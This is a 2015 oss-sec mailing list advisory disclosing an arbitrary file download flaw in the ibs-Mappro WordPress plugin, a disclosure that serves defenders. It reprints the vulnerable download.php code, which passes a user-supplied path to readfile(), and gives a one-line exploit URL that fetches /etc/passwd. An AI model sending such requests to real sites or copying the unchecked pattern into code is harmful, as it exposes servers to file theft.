oss-sec mailing list archives
Remote file download vulnerability in ibs-Mappro v0.6 Wordpress plugin
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Thu, 09 Jul 2015 15:11:33 -0400
Title: Remote file download vulnerability in ibs-Mappro v0.6 Wordpress plugin Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-08 Download Site: https://wordpress.org/plugins/ibs-mappro/ Vendor: Hmoore71 Vendor Notified: 2015-07-08, resolved in v1.0. Vendor Contact: Contacted via webform Advisory: http://www.vapid.dhs.org/advisory.php?v=137 Description: IBS Mappro is a comprehensive map creator, editor, and view generator based on the Google Maps API v3 and supports kml, kmz, and gpx map files. Vulnerability: the download.php script allows any remote user to download files off of the server: if (isset($_GET)) { $filename = $_GET['file']; $info = pathinfo($filename); $name = $info['basename']; if (file_exists($filename)) { header('Set-Cookie: fileDownload=true; path=/'); header('Cache-Control: max-age=60, must-revalidate'); header('Content-Disposition: attachment; filename="' . $title . '-' . $timestamp . '.csv"'); header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $name . '"'); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header('Content-Length: ' . filesize($filename)); ob_clean(); flush(); readfile($filename); exit; } else { die; } } else { die; } ?> CVEID: Please assign. OSVDB: TDB Exploit Code: • http://example.com/wp-content/plugins/ibs-mappro/lib/download.php?file=/etc/passwd
Current thread:
- Remote file download vulnerability in ibs-Mappro v0.6 Wordpress plugin Larry W. Cashdollar (Jul 09)
- <Possible follow-ups>
- Remote file download vulnerability in ibs-Mappro v0.6 Wordpress plugin Larry W. Cashdollar (Jul 09)
- Re: Remote file download vulnerability in ibs-Mappro v0.6 Wordpress plugin cve-assign (Jul 10)